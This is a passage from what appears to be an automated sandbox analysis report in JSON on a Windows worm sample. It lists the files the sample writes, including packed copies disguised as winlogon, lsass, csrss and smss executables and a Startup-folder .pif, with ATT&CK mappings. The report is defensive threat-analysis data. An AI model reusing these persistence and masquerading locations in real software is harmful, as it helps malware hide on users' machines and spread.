\"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\Windows\\4k51k4.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\4k51k4.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe.cfg\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\c_932.nls\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\c_949.nls\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\c_950.nls\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\c_936.nls\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\CRYPTSP.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTSP.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\rsaenh.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"c:\\users\\desktop.ini\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"c:\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"c:\\windows\\4k51k4.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"c:\\4k51k4.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"c:\\windows\\system32\\shell.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"c:\\windows\\system32\\iexplorer.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe.cfg\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe.Local\\\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" trying to access non-existent file \"C:\\50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\windows\\4k51k4.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\4k51k4.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\lsass.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\smss.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\puisi.txt\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" writes file \"c:\\4k51k4\\folder.htt\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" connecting to \"\\ThemeApiPort\"\n \"4k51k4.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"LSASS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Windows\\4k51k4.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Windows\\System32\\MrHelloween.scr\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\LSASS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\csrss.exe\" (UID: 6024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" queries basic process information of the \"C:\\Puisi.txt\" (UID: 6024)\n \"4k51k4.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (UID: 5832)\n \"4k51k4.exe\" queries basic process information of the \"C:\\Puisi.txt\" (UID: 5832)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\share\" (UID: 4304)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 4304)\n \"CSRSS.EXE\" queries basic process information of the \"C:\\share\" (UID: 3572)\n \"CSRSS.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 3572)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00002632]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\4k51k4.exe]- [targetUID: 00000000-00002632]\n \"CSRSS .exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\4k51k4.exe]- [targetUID: 00000000-00002632]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00002632]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9CA14.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C477.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00002632]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00002632]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\MrHelloween.scr]- [targetUID: 00000000-00002632]\n \"4K51K4.EXE.67A9C852.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C855.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C479.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00002632]\n \"Folder.htt\" has type \"HTML document ASCII text with CRLF line terminators\"- [targetUID: N/A]\n \"Puisi.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [C:\\Puisi.txt]- [targetUID: 00000000-00002632]\n \"desktop.ini\" has type \"Windows desktop.ini\"- [targetUID: 00000000-00002632]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00002632]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00002632]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00002632]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"4K51K4.EXE.67A9CA11.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00004140)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00004140)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00004140)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005992)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005992)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005932)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005932)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005932)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00003572)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00003572)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00002744)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb9475c09d2f0000e0fd7f9a5c3c7700f0fd7f50c7120044e0fd7f00000000400000003f0000002000000000e0fd7f44c71200c15c3c77608243772000000000e0fd7f9a5c3c7700f0fd7f68c7120057893b778083437713174975d8eb9475 (UID: 00000000-00006024)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21bc801d01bc8010016c8010000c501e414c801880000008800000017683b779817c801ff2b3b777acd5e77a41bc801ac013000000030000000c501c06dc5011200a2000f080000c06dc5015016c801100000000000000013009d000f080000c06dc501 (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb9475d0d0340000f0fd7f9a5c3c7700e0fd7f50c7120044f0fd7f00000000400000003f0000002000000000f0fd7f44c71200c15c3c77608243772000000000f0fd7f9a5c3c7700e0fd7f68c7120057893b778083437713174975d8eb9475 (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21bb801d01bb8010016b8010000b501e414b801880000008800000017683b779817b801ff2b3b7743be5e77a41bb801ac012f0000002f000000b501c06db5010300ed002f050000c06db5015016b80110000000000000000400e8002f050000c06db501 (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb9475d894330000b0fd7f9a5c3c7700f0fd7f50c7120044b0fd7f00000000400000003f0000001f00000000b0fd7f44c71200c15c3c77608243771f00000000b0fd7f9a5c3c7700f0fd7f68c7120057893b778083437713174975d8eb9475 (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21bc901d01bc9010016c9010000c601e414c901880000008800000017683b779817c901ff2b3b7715b35e77a41bc901ac012700000027000000c601c06dc6011400980060030000c06dc6015016c90110000000000000001500930060030000c06dc601 (UID: 00000000-00004140)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21ba801d01ba8010016a8010000a501e414a801880000008800000017683b779817a801ff2b3b77f3ab5e77a41ba801ac012500000025000000a501c06da50116008e00e6010000c06da5015016a801100000000000000017008900e6010000c06da501 (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb9475b8d2290000c0fd7f9a5c3c7700f0fd7f50c7120044c0fd7f00000000400000003f0000002000000000c0fd7f44c71200c15c3c77608243772000000000c0fd7f9a5c3c7700f0fd7f68c7120057893b778083437713174975d8eb9475 (UID: 00000000-00004304)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a0010000d21b0402d01b04020016040200000102e4140402880000008800000017683b7798170402ff2b3b776bae5e77a41b0402ac0129000000290000000102c06d010216008e00e6010000c06d010250160402100000000000000017008900e6010000c06d0102 (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750593b7798010000a00100005a1bc801581bc8018815c8010000c5016c14c801880000008800000017683b772017c801ff2b3b774aae5e772c1bc801ac015f0000005f000000c501905bc5011200a20019040000905bc501d815c801100000000000000013009d0019040000905bc501 